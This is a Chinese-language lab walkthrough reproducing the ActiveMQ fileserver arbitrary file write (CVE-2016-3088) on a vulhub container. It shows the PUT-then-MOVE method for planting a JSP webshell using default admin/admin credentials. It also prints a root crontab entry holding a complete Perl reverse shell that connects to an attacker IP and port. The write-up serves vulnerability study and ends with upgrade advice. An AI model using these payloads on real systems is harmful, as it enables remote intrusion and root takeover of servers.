ActiveMQ介绍：

Apache ActiveMQ 是 Apache 软件基金会所研发的一套开源的消息中间件，它支持 Java 消息服务、集群、Spring Framework 等。随着中间件的启动，会打开两个端口，61616 是工作端口，消息在这个端口进行传递；8161 是 Web 管理控制台。

ActiveMQ任意文件写入漏洞

ActiveMQ 的 web 控制台分三个应用：admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。

fileserver是一个RESTful API接口，可以通过GET、PUT、MOVE等HTTP请求对其中存储的文件进行读写操作，但后来发现其使用率并不高，并且容易出现漏洞。

所以，ActiveMQ在5.12.x~5.13.x版本中，已经默认关闭了fileserver这个应用（可以在conf/jetty.xml中开启）；在5.14.0版本以后，彻底删除了fileserver应用。

漏洞详情：

本漏洞出现在 fileserver 应用中，漏洞原理很简单，就是 fileserver 支持写入文件（但不解析jsp），但是支持移动文件（MOVE请求）。我们可以将jsp的文件PUT到 fileserver 下，然后再通过Move指令移动到可执行目录下（admin和api），造成任意文件写入漏洞。

文件写入常用的有下面两种方式：

• 写入webshell
• 写入cron或ssh key等文件

写入webshell的好处是，门槛低更方便，前面说了 fileserver 不解析jsp，admin和api两个应用都需要登录才能访问，所以存在默认用户登录的情况可以用这种；写入cron或ssh key，好处是直接反弹拿shell，也比较方便，缺点是需要root权限；

环境搭建:

靶场路径：

vulhub/activemq/CVE-2016-3088/

启动容器：

docker-compose up -d

复现过程:

访问环境：

分别用两种方式复现一下。

1、写入webshell：

本环境的账号密码就是默认的 admin/admin。上传个文件到 fileserver看一下，发现 jsp 类型的文件上传失败，改为 txt 上传成功。（有些情况下是可以直接上传 jsp 的，但是解析不了还是要移动文件）


接着移动到 admin 或 api 路径下并改后缀名为jsp就行了，但是需要知道上传路径，可通过 /admin/test/systemProperties.jsp 查看 ActiveMQ 的绝对路径

移动到 api 下，并且改后缀名

成功移动文件，访问 api/test.jsp 成功解析。

同理如果上传一个冰蝎马就能getshell了。连接冰蝎马的时候因为要登录验证，所以需要加 headers 头

Authorization:Basic YWRtaW46YWRtaW4=

2、写入crontab，自动化弹shell

在 /admin/test/systemProperties.jsp 可以看到运行ActiveMQ的用户是root，也就是说可以使用这种方法。

首先上传cron配置文件（注意，换行一定要\n，不能是\r\n，否则crontab执行会失败）

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.50.131";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

解释：这里反弹 shell 用的是 perl shell（bash shell 用不了），能成功的前提是服务器上安装了perl（看运气）。

• */1 * * * * 表示定时任务执行时间是每分钟一次
• root 表示执行定时任务的用户
• /usr/bin/perl 是 perl 的绝对路径
• $i为攻击机ip，$p为攻击机监听的端口

如果上述两个请求都返回204了，说明写入成功。监听端口，反弹 shell 成功。

漏洞防御：

ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。